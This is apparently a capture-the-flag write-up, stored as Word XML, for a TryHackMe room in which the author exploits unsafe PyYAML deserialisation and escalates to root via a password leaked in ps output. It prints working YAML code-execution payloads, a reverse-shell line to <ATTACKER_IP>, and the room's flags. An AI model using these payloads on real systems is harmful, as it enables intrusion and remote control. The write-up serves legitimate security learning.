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50C7" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7C1F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Beach Bar (TryHackMe, Hacker Holidays 2026)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3545E21F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Easy box, part of the Byte Lotus Hotel series. Web exploitation into unsafe YAML deserialisation, then a lazy root escalation. Took me about half an hour once I actually knew what I was doing, would've taken longer if I hadn't been pointed at page source first (fully admit I'd have tried logging in with random guesses otherwise).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55009474" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="280" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7C1F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124C1423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Hit the box IP in the browser and it bounces straight to /login. First instinct with any login page is to just look at the source before trying anything clever, and sure enough there's a dev comment sat in the HTML basically handing over creds. Demo DJ login that never got switched off before launch, with a ticket number and everything referencing it. Classic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAD4F12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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ABD7BE0" wp14:editId="624613FE">
            <wp:extent cx="4762500" cy="120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1C8A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source comment with leaked creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B69A0C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Logged in with dj / dj and I was straight into a dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204095E1" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="280" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7C1F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Finding the bug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C29235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Dashboard has a playlist manager with import and export. Export gave me a normal looking playlist.yml, standard YAML with a playlist object, name, vibe, and a list of tracks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6FE14F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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3579EC63" wp14:editId="216E6822">
            <wp:extent cx="4067175" cy="3267075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1488836715" name="Picture 1488836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564F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exported playlist.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB300E6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lastRenderedPageBreak/>
        <w:t>Import takes either a pasted YAML blob or a file upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A36361F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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="239DB5D9" wp14:editId="745602F8">
            <wp:extent cx="4762500" cy="3971925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1993659164" name="Picture 199365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1071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import playlist box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCE75FA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The fact it's parsing user supplied YAML server side is the interesting bit here. If the backend is using yaml.load() instead of yaml.safe_load() in Python, YAML has this tag syntax (!!python/object/apply:module.function) that lets you tell the parser to actually construct and call a Python function while it's loading the file, not just read it as data. That's basically free code execution if it's unsafe, and it was here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A90B0C4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Tested it small first rather than going straight for a shell, just ran whoami:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDA2AD6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playlist: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name: !!python/object/apply:subprocess.check_output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  - ["whoami"]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vibe: test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tracks: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAA5990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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22BCECB1" wp14:editId="44D0FADF">
            <wp:extent cx="4762500" cy="5133975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2040460220" name="Picture 204046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D309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whoami test coming back as bartender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BEE57F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Imported it and the response literally reflected back b'bartender\n' in the name field. Confirmed, command execution as the bartender user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E772230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Swapped whoami for cat on the user flag path and got the flag straight back the same way, no shell needed yet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B67583E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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20351C2C" wp14:editId="308691B0">
            <wp:extent cx="4762500" cy="5314950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="732595451" name="Picture 73259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FCF8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user flag straight out of the yaml field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE583A5" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing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  <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>THM{y4ml_pl4yl1st_pwns_th3_b34ch}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F82AB6" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="280" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7C1F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Getting a shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8B2C76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Reading files one command at a time through a web field gets old fast so I set up a listener on the AttackBox:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22356204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nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FE014D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Then imported this instead of the check_output version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F84DC9C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playlist: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name: !!python/object/apply:os.system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  - "bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;ATTACKER_IP&gt;/4444 0&gt;&amp;1'"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vibe: test</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7C1F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AA7C1F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Consolas" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">  tracks: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37102D68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lastRenderedPageBreak/>
        <w:t>Same trick but using os.system to fire off a reverse shell one liner instead of just returning output. Got a callback almost instantly, dropped into a shell as bartender on tryhackme-2404.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AAB55E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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="358FCE47" wp14:editId="68E93C41">
            <wp:extent cx="4762500" cy="1876425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1493931886" name="Picture 149393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8EAB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reverse shell landing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FA26D1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Bit of a rough shell at first (no job control, can't set terminal process group, the usual netcat moans), so upgraded it with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAFF199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python3 -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD453F9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then ctrl+z to background it and stty raw -echo; fg on my end to sort the terminal out properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA645B0" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="280" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7C1F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Privesc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CC1655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Room hint was basically pointing at a running service, so once the shell was stable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2481607F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ps aux | grep -i jukebox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125FA2A9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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56B967DF" wp14:editId="21D2C32F">
            <wp:extent cx="4762500" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1162411654" name="Picture 116241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DB8C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jukebox process leaking the root password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C685DF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And there it is, a jukeboxd.py service running as root with its startup args showing in plain sight:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380A60CD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/opt/beach-bar/venv/bin/python /opt/beach-bar/jukeboxd/jukeboxd.py --stream-pass SunsetSpritz2024! --bitrate 320k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01307970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Password just sat there in the process list for anyone with a shell to read. Genuinely rookie mistake to bake a secret into a CLI arg like that, ps aux shows it to literally any local user, doesn't matter how locked down the file permissions are elsewhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAF6374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Figured the password was probably reused (it usually is on these boxes) so tried:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52872199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su root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2520C253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Password prompt, chucked in SunsetSpritz2024!, and I was root straight away.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CBB886" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1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</w:rPr>
        <w:t>cat /root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4672ECBB" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="6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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D96AE81" wp14:editId="08B148D5">
            <wp:extent cx="4762500" cy="4057650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1882497381" name="Picture 188249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AC1B" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7C1F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>root flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49077069" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7C1F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Consolas" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>THM{cr3d3nt14l_r3us_4t_th3_b34ch_b4r}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D703580" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7C1F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Room done, all flags submitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C142AC" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="280" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7C1F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55278BC9" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1F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AA7C1F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Always check page source before trying to brute force or inject a login, sometimes the answer is just sat there in a comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A8CE9" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1F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AA7C1F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>yaml.load() vs yaml.safe_load() is one of those things that looks harmless until it isn't, never deserialise untrusted YAML with the unsafe loader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206CC041" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1F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AA7C1F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Don't pass secrets as command line arguments to a service, anything readable via ps aux is basically public on that box regardless of file perms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07184FE3" w14:textId="77777777" w:rsidR="00E24E39" w:rsidRPr="00AA7C1F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AA7C1F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Password reuse between a service secret and a user account is still depressingly common and still works as an attack path, even in a fictional beach bar</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E24E39" w:rsidRPr="00AA7C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6DB6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D4C8BD4C"/>
    <w:lvl w:ilvl="0" w:tplc="91804C52">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7C1A56EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="817E2C8E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8988C322">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="677C58E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C00405E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="BD5C0E30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="AC84EE92">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E0221812">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="797770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E39"/>
    <w:rsid w:val="00AA7C1F"/>
    <w:rsid w:val="00E24E39"/>
    <w:rsid w:val="00F0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FC62"/>
  <w15:docId w15:val="{1BFB7BCC-68F2-4D21-9E6A-E4DF5698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BRACE L. (2319506)</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-05T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-05T12:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>